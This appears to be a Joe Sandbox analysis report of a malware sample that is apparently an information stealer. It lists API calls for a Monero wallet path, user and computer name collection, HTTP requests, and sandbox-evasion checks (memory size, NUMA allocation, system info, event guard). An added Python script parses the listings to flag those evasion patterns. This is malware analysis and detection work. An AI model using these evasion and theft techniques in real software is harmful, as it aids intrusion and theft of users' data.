                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: block
                                    • API String ID: 621844428-2199623458
                                    • Opcode ID: d09dcf02b4ee3080755d9451ec6b2e0b19b1bec4e242f6a7161684072ce7ddc6
                                    • Instruction ID: ea401dcf6f88f344c6493aa581840887aa1ab1022e6ed6b49da2bf887db2baa7
                                    • Opcode Fuzzy Hash: d09dcf02b4ee3080755d9451ec6b2e0b19b1bec4e242f6a7161684072ce7ddc6
                                    • Instruction Fuzzy Hash: 825152B5B0420AEFCF04DFA4DA59BAE77BAEF44744F144058F912AB250E770EA40DB91

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00C99BB0: GetProcAddress.KERNEL32(75900000,01520600), ref: 00C99BF1
                                      • Part of subcall function 00C99BB0: GetProcAddress.KERNEL32(75900000,015207C8), ref: 00C99C0A
                                      • Part of subcall function 00C99BB0: GetProcAddress.KERNEL32(75900000,015206F0), ref: 00C99C22
                                      • Part of subcall function 00C99BB0: GetProcAddress.KERNEL32(75900000,01520618), ref: 00C99C3A
                                      • Part of subcall function 00C99BB0: GetProcAddress.KERNEL32(75900000,015207F8), ref: 00C99C53
                                      • Part of subcall function 00C99BB0: GetProcAddress.KERNEL32(75900000,01528BB0), ref: 00C99C6B
                                      • Part of subcall function 00C99BB0: GetProcAddress.KERNEL32(75900000,01516400), ref: 00C99C83
                                      • Part of subcall function 00C99BB0: GetProcAddress.KERNEL32(75900000,01516440), ref: 00C99C9C
                                      • Part of subcall function 00C99BB0: GetProcAddress.KERNEL32(75900000,01520810), ref: 00C99CB4
                                      • Part of subcall function 00C99BB0: GetProcAddress.KERNEL32(75900000,01520678), ref: 00C99CCC
                                      • Part of subcall function 00C99BB0: GetProcAddress.KERNEL32(75900000,015206A8), ref: 00C99CE5
                                      • Part of subcall function 00C99BB0: GetProcAddress.KERNEL32(75900000,01520828), ref: 00C99CFD
                                      • Part of subcall function 00C99BB0: GetProcAddress.KERNEL32(75900000,015162A0), ref: 00C99D15
                                      • Part of subcall function 00C99BB0: GetProcAddress.KERNEL32(75900000,01520840), ref: 00C99D2E
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C811D0: ExitProcess.KERNEL32 ref: 00C81211
                                      • Part of subcall function 00C81160: GetSystemInfo.KERNEL32(?), ref: 00C8116A
                                      • Part of subcall function 00C81160: ExitProcess.KERNEL32 ref: 00C8117E
                                      • Part of subcall function 00C81110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00C8112B
                                      • Part of subcall function 00C81110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00C81132
                                      • Part of subcall function 00C81110: ExitProcess.KERNEL32 ref: 00C81143
                                      • Part of subcall function 00C81220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00C8123E
                                      • Part of subcall function 00C81220: __aulldiv.LIBCMT ref: 00C81258
                                      • Part of subcall function 00C81220: __aulldiv.LIBCMT ref: 00C81266
                                      • Part of subcall function 00C81220: ExitProcess.KERNEL32 ref: 00C81294
                                      • Part of subcall function 00C96A10: GetUserDefaultLangID.KERNEL32 ref: 00C96A14
                                      • Part of subcall function 00C81190: ExitProcess.KERNEL32 ref: 00C811C6
                                      • Part of subcall function 00C979E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00C811B7), ref: 00C97A10
                                      • Part of subcall function 00C979E0: RtlAllocateHeap.NTDLL(00000000), ref: 00C97A17
                                      • Part of subcall function 00C979E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C97A2F
                                      • Part of subcall function 00C97A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C97AA0
                                      • Part of subcall function 00C97A70: RtlAllocateHeap.NTDLL(00000000), ref: 00C97AA7
                                      • Part of subcall function 00C97A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00C97ABF
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01528A30,?,00CA10F4,?,00000000,?,00CA10F8,?,00000000,00CA0AF3), ref: 00C96D6A
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C96D88
                                    • CloseHandle.KERNEL32(00000000), ref: 00C96D99
                                    • Sleep.KERNEL32(00001770), ref: 00C96DA4
                                    • CloseHandle.KERNEL32(?,00000000,?,01528A30,?,00CA10F4,?,00000000,?,00CA10F8,?,00000000,00CA0AF3), ref: 00C96DBA
                                    • ExitProcess.KERNEL32 ref: 00C96DC2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                    • String ID:
                                    • API String ID: 2525456742-0
                                    • Opcode ID: bd7108108cbf49a10addb1e55ace8d268fb3cb4147b2e77d2e18dd9247b54827
                                    • Instruction ID: 736061579f2af692a76257332096409aaee8c6e4abf29c1d4fe84ccbdde335e9
                                    • Opcode Fuzzy Hash: bd7108108cbf49a10addb1e55ace8d268fb3cb4147b2e77d2e18dd9247b54827
                                    • Instruction Fuzzy Hash: AD31FC71A04208ABCF04FBF0DC5EAEE7779AF04741F144918F61266191DF706A05A7A6

                                    Control-flow Graph

                                    control_flow_graph 1436 c81220-c81247 call c98b40 GlobalMemoryStatusEx 1439 c81249-c81271 call c9dd30 * 2 1436->1439 1440 c81273-c8127a 1436->1440 1442 c81281-c81285 1439->1442 1440->1442 1444 c8129a-c8129d 1442->1444 1445 c81287 1442->1445 1447 c81289-c81290 1445->1447 1448 c81292-c81294 ExitProcess 1445->1448 1447->1444 1447->1448
                                    APIs
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00C8123E
                                    • __aulldiv.LIBCMT ref: 00C81258
                                    • __aulldiv.LIBCMT ref: 00C81266
                                    • ExitProcess.KERNEL32 ref: 00C81294
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                    • String ID: @
                                    • API String ID: 3404098578-2766056989
                                    • Opcode ID: ce8f771c87ca399674f85e3820771fafb13f9c49ab58427d646832a60552cf64
                                    • Instruction ID: 4d3c1fde18ef1c3a5d1b1678a8875d863c3412e07df9f871b603abf99375df05
                                    • Opcode Fuzzy Hash: ce8f771c87ca399674f85e3820771fafb13f9c49ab58427d646832a60552cf64
                                    • Instruction Fuzzy Hash: C10112B0D44308BBDF10EFE4DD49BADB7BCAB14709F148448EB05B61C0D674554697A9

                                    Control-flow Graph

                                    control_flow_graph 1450 c96d93 1451 c96daa 1450->1451 1453 c96d5a-c96d77 call c9ade0 OpenEventA 1451->1453 1454 c96dac-c96dc2 call c96bc0 call c95d60 CloseHandle ExitProcess 1451->1454 1460 c96d79-c96d91 call c9ade0 CreateEventA 1453->1460 1461 c96d95-c96da4 CloseHandle Sleep 1453->1461 1460->1454 1461->1451
                                    APIs
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01528A30,?,00CA10F4,?,00000000,?,00CA10F8,?,00000000,00CA0AF3), ref: 00C96D6A
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C96D88
                                    • CloseHandle.KERNEL32(00000000), ref: 00C96D99
                                    • Sleep.KERNEL32(00001770), ref: 00C96DA4
                                    • CloseHandle.KERNEL32(?,00000000,?,01528A30,?,00CA10F4,?,00000000,?,00CA10F8,?,00000000,00CA0AF3), ref: 00C96DBA
                                    • ExitProcess.KERNEL32 ref: 00C96DC2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                    • String ID:
                                    • API String ID: 941982115-0
                                    • Opcode ID: 9ad9bc0bb670559f25f5807298732b0ec68c4b42b9af224b2786140f70be5f37
                                    • Instruction ID: a739985c1013939c8cfd06ad3c7244faa42341b03df62b8c935d8fb9da0bc1f3
                                    • Opcode Fuzzy Hash: 9ad9bc0bb670559f25f5807298732b0ec68c4b42b9af224b2786140f70be5f37
                                    • Instruction Fuzzy Hash: AAF01231A48709AFEF10BBA0EC0EBBE7774AF04B42F200515B622A51D5DBB05640EAA5
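Added example, not part of the Joe Sandbox report and not code from the analysed sample: a Python parser for the "APIs" bullet format used in these function entries, with set-based heuristics that flag the anti-analysis sequences the listings above show, namely GlobalMemoryStatusEx followed by ExitProcess at 00C81220, VirtualAllocExNuma followed by ExitProcess at 00C81110, GetSystemInfo followed by ExitProcess at 00C81160, and the OpenEventA/CreateEventA/Sleep guard at 00C96D93. The sample input is copied from this report's own bullets; the pattern labels, the choice of APIs per pattern, and the "self" label given to un-prefixed bullets are this example's assumptions, not sandbox signatures.

```python
"""Parse the "APIs" bullets of a Joe Sandbox function entry and flag
anti-analysis call patterns.  Added example for this report; the
heuristics below are the example's own, not the sandbox's signatures."""
import re
from collections import defaultdict

# One bullet of the report's API listing, e.g.
#   • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00C8123E
#   • Part of subcall function 00C81220: ExitProcess.KERNEL32 ref: 00C81294
API_LINE = re.compile(
    r"""^\s*•\s*
        (?:Part\ of\ subcall\ function\ (?P<sub>[0-9A-Fa-f]{8}):\s*)?
        (?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<dll>[A-Za-z0-9_]+)
        (?:\((?P<args>[^)]*)\))?
        \s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})""",
    re.VERBOSE,
)

# Assumption: a bullet without a "Part of subcall function" prefix belongs to
# the function whose entry is being read; the listing does not repeat that
# function's address per line, so it is labelled "self" here.
SELF = "self"


def parse_api_lines(text):
    """Return one dict per API bullet: func, api, dll, args (list), ref."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # headings, memory-dump lines, CFG text
        raw_args = m.group("args")
        calls.append({
            "func": m.group("sub").upper() if m.group("sub") else SELF,
            "api": m.group("api"),
            "dll": m.group("dll"),
            "args": [a.strip() for a in raw_args.split(",")] if raw_args else [],
            "ref": m.group("ref").upper(),
        })
    return calls


def group_by_function(calls):
    """Map function label -> ordered list of API names called from it."""
    seq = defaultdict(list)
    for c in calls:
        seq[c["func"]].append(c["api"])
    return dict(seq)


# Each pattern: a label and the set of APIs that must all occur in one
# function.  Mirrors the checks visible in this report; heuristics only.
EVASION_PATTERNS = [
    ("RAM-size sandbox check", {"GlobalMemoryStatusEx", "ExitProcess"}),
    ("NUMA allocation sandbox check", {"VirtualAllocExNuma", "ExitProcess"}),
    ("CPU/system-info sandbox check", {"GetSystemInfo", "ExitProcess"}),
    ("single-instance event guard with delay loop",
     {"OpenEventA", "CreateEventA", "Sleep"}),
]


def flag_evasion(calls):
    """Return (function label, pattern label) pairs for every matched pattern."""
    findings = []
    for func, apis in group_by_function(calls).items():
        present = set(apis)
        for label, required in EVASION_PATTERNS:
            if required <= present:
                findings.append((func, label))
    return findings


def sleep_delays_ms(calls):
    """Decode the hex first argument of every Sleep call into milliseconds."""
    return [int(c["args"][0], 16) for c in calls
            if c["api"] == "Sleep" and c["args"] and c["args"][0] != "?"]


# Sample input: bullets copied from this report's entry for the function at
# 00C96D93 and from the subcall lines it lists for 00C81160, 00C81110, 00C81220.
SAMPLE = """
• Part of subcall function 00C81160: GetSystemInfo.KERNEL32(?), ref: 00C8116A
• Part of subcall function 00C81160: ExitProcess.KERNEL32 ref: 00C8117E
• Part of subcall function 00C81110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00C8112B
• Part of subcall function 00C81110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00C81132
• Part of subcall function 00C81110: ExitProcess.KERNEL32 ref: 00C81143
• Part of subcall function 00C81220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00C8123E
• Part of subcall function 00C81220: __aulldiv.LIBCMT ref: 00C81258
• Part of subcall function 00C81220: __aulldiv.LIBCMT ref: 00C81266
• Part of subcall function 00C81220: ExitProcess.KERNEL32 ref: 00C81294
• OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01528A30,?,00CA10F4,?,00000000,?,00CA10F8,?,00000000,00CA0AF3), ref: 00C96D6A
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C96D88
• CloseHandle.KERNEL32(00000000), ref: 00C96D99
• Sleep.KERNEL32(00001770), ref: 00C96DA4
• CloseHandle.KERNEL32(?,00000000,?,01528A30,?,00CA10F4,?,00000000,?,00CA10F8,?,00000000,00CA0AF3), ref: 00C96DBA
• ExitProcess.KERNEL32 ref: 00C96DC2
"""

if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE)
    for func, label in flag_evasion(calls):
        print(f"{func}: {label}")
    print("Sleep delays (ms):", sleep_delays_ms(calls))
```

On the sample above the parser yields fifteen calls, the three subcall functions each match one sandbox-check pattern, the entry's own bullets match the event-guard pattern, and Sleep(00001770) decodes to 6000 ms. The heuristics are set-based, so they ignore call order; a stricter version would also require that the ExitProcess ref lie after the probing API's ref within the same function, which the ref addresses in the bullets make possible.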

                                    Control-flow Graph

                                    APIs
                                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C84889
                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 00C84899
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CrackInternetlstrlen
                                    • String ID: <
                                    • API String ID: 1274457161-4251816714
                                    • Opcode ID: 2e41ff5367251f77cec2d1d4aba37df21fcceac36601e0729786880e2de03d2c
                                    • Instruction ID: 1a851d40d4a36b0deebdd1f983bd16e4c7215776254afd98e9d3cca447df6b3f
                                    • Opcode Fuzzy Hash: 2e41ff5367251f77cec2d1d4aba37df21fcceac36601e0729786880e2de03d2c
                                    • Instruction Fuzzy Hash: 6E214FB1D00208ABDF14EFA5EC4AADD7B78FB44321F108625F915A72D0DB706A0ACF91

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00C9AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00C9AAF6
                                      • Part of subcall function 00C862D0: InternetOpenA.WININET(00CA0DFF,00000001,00000000,00000000,00000000), ref: 00C86331
                                      • Part of subcall function 00C862D0: StrCmpCA.SHLWAPI(?,0152E3C0), ref: 00C86353
                                      • Part of subcall function 00C862D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C86385
                                      • Part of subcall function 00C862D0: HttpOpenRequestA.WININET(00000000,GET,?,0152DA28,00000000,00000000,00400100,00000000), ref: 00C863D5
                                      • Part of subcall function 00C862D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C8640F
                                      • Part of subcall function 00C862D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C86421
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C95478
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                    • String ID: ERROR$ERROR
                                    • API String ID: 3287882509-2579291623
                                    • Opcode ID: f146b2770919ccc8edf60b012399a330583b9eaeef4d62d01ad92fbad09806a7
                                    • Instruction ID: f7bc433d0cf4daa2649d9a25a9b73ac46fa84453e7ac13ade04ff95d4fe5f0af
                                    • Opcode Fuzzy Hash: f146b2770919ccc8edf60b012399a330583b9eaeef4d62d01ad92fbad09806a7
                                    • Instruction Fuzzy Hash: 0B110C31900108ABCF14FFA4DD9AAED7779AF50340F504568F91A5B492EF30AB05EBD5
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C97AA0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C97AA7
                                    • GetComputerNameA.KERNEL32(?,00000104), ref: 00C97ABF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateComputerNameProcess
                                    • String ID:
                                    • API String ID: 1664310425-0
                                    • Opcode ID: 83f98132bfaf55fafc8749c59255c4f48a0a688e3853542def28eb36b2fcb818
                                    • Instruction ID: c524136019a029d161887495f45c298083ea0da395165bf4944aca866cf331c0
                                    • Opcode Fuzzy Hash: 83f98132bfaf55fafc8749c59255c4f48a0a688e3853542def28eb36b2fcb818
                                    • Instruction Fuzzy Hash: 6F0186B1A08349ABCB00DF99DD49BAFBBB8F704711F100219F605E2280D7745A00DBA1
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00C8112B
                                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 00C81132
                                    • ExitProcess.KERNEL32 ref: 00C81143
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     Joe Sandbox IDA Plugin
                                     • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Similarity
                                    • API ID: Process$AllocCurrentExitNumaVirtual
                                    • String ID:
                                    • API String ID: 1103761159-0
                                    • Opcode ID: 9b45ceba09703a4db38d3d2400d396cf6c9d6b957c13dec347621677eb38040c
                                    • Instruction ID: 885a0ec84be67c36dfe7fc8b35f7d9a33c1d11eb2ac9266ba7bd8cf3875fd0c2
                                    • Opcode Fuzzy Hash: 9b45ceba09703a4db38d3d2400d396cf6c9d6b957c13dec347621677eb38040c
                                    • Instruction Fuzzy Hash: FAE0E67094930CFBE7107B91AD0EB5D76AC9B04B16F100155FB09765D0C7B52640AA9D
                                    APIs
